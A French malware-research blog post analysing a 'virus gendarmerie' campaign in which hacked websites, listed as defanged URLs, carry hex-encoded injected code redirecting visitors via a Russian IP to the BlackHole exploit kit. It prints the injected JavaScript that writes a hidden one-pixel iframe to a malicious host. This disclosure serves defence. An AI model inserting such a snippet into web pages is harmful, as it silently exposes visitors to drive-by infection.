91.196.216.64 : Hack de sites Web FR pour le virus gendarmerie

On continue avec le TDS et la campagne du Virus Gendarmerie en France.
Comme vous pouvez le constater ci-dessous, les redirections sont toujours aussi énormes.

Alors que la malvertising de clicksor.com est toujours active, les redirections via ZeroAccess ont un peu baissé.
On constate que l’adresse des malvertising reste en tête (sp-adhitcounter.com).
On peux aussi constater que pas mal de sites ont été hackés pour conduire à l’exploit sur site WEB pour dropper le malware.

Voici une liste :

hxtp://www.lesinrocks.com
hxtp://www.sport.ro
hxtp://www.aide-et-action.org
hxtp://www.leblogpatrimoine.com
hxtp://runforyourlives.com
hxtp://ococean.com
hxtp://wiegaertnerfilms.com
hxtp://www.glennismusic.nl/
hxtp://www.assassinscreedfrance.fr
hxtp://www.yalibnan.com
hxtp://lafabriquehexagonale.com
hxtp://www.bullesdegones.com/
hxtp://le-site-du-skateboard.com/
hxtp://terrariawiki.fr
hxtp://www.glennismusic.nl
hxtp://www.aisne.com
hxtp://www.beloteweb.eu
hxtp://www.guzet.fr
hxtp://www.sxminfo.com
hxtp://www.letsbefriendsagain.com
hxtp://stirileprotv.ro/
hxtp://www.vinaigreblanc.com/
hxtp://itiswhatitis.weei.com
hxtp://www.torrent-francais.fr
hxtp://minecraft.fr/forum/index.php

Notamment ci-dessous le site « lesinrocks.com » qui a un ranking de 12k environ ce qui est pas mal.

Ci-dessous la connexion à l’URL malicieuse 91.196.216.64/s.php (RU) avec les paramètres – que l’on retrouve bien entendu sur tous les sites hackés :

Ci-dessous quelques exemples de pages modifiées avec l’ajout du code. Par exemple dans le cas du site lesinrock, pas mal de pages qui sont chargées par la page d’index sont touchées, ce qui va rendre la désinfection plus difficile.


Le code est en hexadécimal, le site suivant permet de passer en ASCII http://www.yellowpipe.com/yis/tools/encrypter/index.php
On retrouve l’IP Russe.

 

 

La page fait office de redirections pour attaquer le BlackHole via une iframe – BlacHole étant pour rappel, le Exploit WebKit qui gère le charge de l’infection :
element=document.getElementById('nf_co');
if(!element){
document.write('<iframe src="http://hgjfjg55555555555555.nl.ai/in.cgi?6" id="nf_co" width="1" height="1"></iframe>');
}


Je vous fait grâce de la suite avec le chargement de l’infection via l’exploit – je pense qu’avec les divers sujets précédents, vous avez compris.

On voit donc, une troisième phase via des hacks de site WEB – Cela permet de maintenir une campagne active et infecter encore pas mal d’internautes.

EDIT quelques autres sites touchés :

hxtp://www.aide-et-action.org
hxxp://artoftheguillotine.edu
hxtp://www.yariga.ne
hxtp://ococean.com
hxtp://www.yalibnan.com
hxtp://www.oobby.com
hxtp://www.healthy-magazine.co.uk
hxtp://www.letsbefriendsagain.com
hxtp://www.oobby.com/tag/angry-birds
hxtp://parkablogs.com
hxtp://www.3ddesktops.co.uk
hxtp://www.robertsautosales.com
hxtp://www.tendal.eu
hxtp://lafabriquehexagonale.com
hxtp://decorhacks.com
hxtp://www.guzet.fr
hxtp://www.gummibar.net
hxtp://counterpropaganda.ie
hxtp://www.glennismusic.nl
hxtp://wiegaertnerfilms.com
hxtp://indius.fr
hxtp://www.tipsgames.net
hxtp://wahackpokemon.com

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 38 times, 1 visits today)

3 thoughts on “91.196.216.64 : Hack de sites Web FR pour le virus gendarmerie

  1. Merci pour ces infos, je découvre à ma grande stupeur qu’un de mes sites est cité dans votre liste et qu’au moins 2 de mes autres blogs WP est infecté… Mais comment résoudre cela et supprimer toute infection ? Merci d’avance

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *